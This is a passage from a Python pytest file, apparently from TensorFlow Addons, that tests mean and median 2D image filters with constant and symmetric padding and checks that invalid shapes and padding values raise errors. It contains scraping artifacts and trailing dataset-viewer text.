[3.3333333, 5.0, 4.0],
[3.2222223, 4.6666665, 3.6666667],
]
)
verify_values(
mean_filter2d,
image_shape=image_shape,
filter_shape=(3, 3),
padding="CONSTANT",
constant_values=1,
expected_plane=expected_plane,
)
@pytest.mark.usefixtures("maybe_run_functions_eagerly")
@pytest.mark.parametrize("image_shape", _image_shapes_to
|
_test)
def test_symmetric_padding_with_3x3_filter_mean(image_shape):
expected_plane = tf.constant(
[
[2.3333333, 3.0, 3.6666667],
[4.3333335, 5.0, 5.6666665],
|
[6.3333335, 7.0, 7.6666665],
]
)
verify_values(
mean_filter2d,
image_shape=image_shape,
filter_shape=(3, 3),
padding="SYMMETRIC",
constant_values=0,
expected_plane=expected_plane,
)
@pytest.mark.parametrize("image_shape", [(1,), (16, 28, 28, 1, 1)])
def test_invalid_image_median(image_shape):
with pytest.raises((ValueError, tf.errors.InvalidArgumentError)):
image = tf.ones(shape=image_shape)
median_filter2d(image)
@pytest.mark.parametrize("filter_shape", [(3, 3, 3), (3, None, 3)])
def test_invalid_filter_shape_median(filter_shape):
image = tf.ones(shape=(1, 28, 28, 1))
with pytest.raises(ValueError):
median_filter2d(image, filter_shape=filter_shape)
filter_shape = None
with pytest.raises(TypeError):
mean_filter2d(image, filter_shape=filter_shape)
def test_invalid_padding_median():
image = tf.ones(shape=(1, 28, 28, 1))
with pytest.raises(ValueError):
median_filter2d(image, padding="TEST")
def test_none_channels_median():
# 3-D image
fn = median_filter2d.get_concrete_function(
tf.TensorSpec(dtype=tf.dtypes.float32, shape=(3, 3, None))
)
fn(tf.ones(shape=(3, 3, 1)))
fn(tf.ones(shape=(3, 3, 3)))
# 4-D image
fn = median_filter2d.get_concrete_function(
tf.TensorSpec(dtype=tf.dtypes.float32, shape=(1, 3, 3, None))
)
fn(tf.ones(shape=(1, 3, 3, 1)))
fn(tf.ones(
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.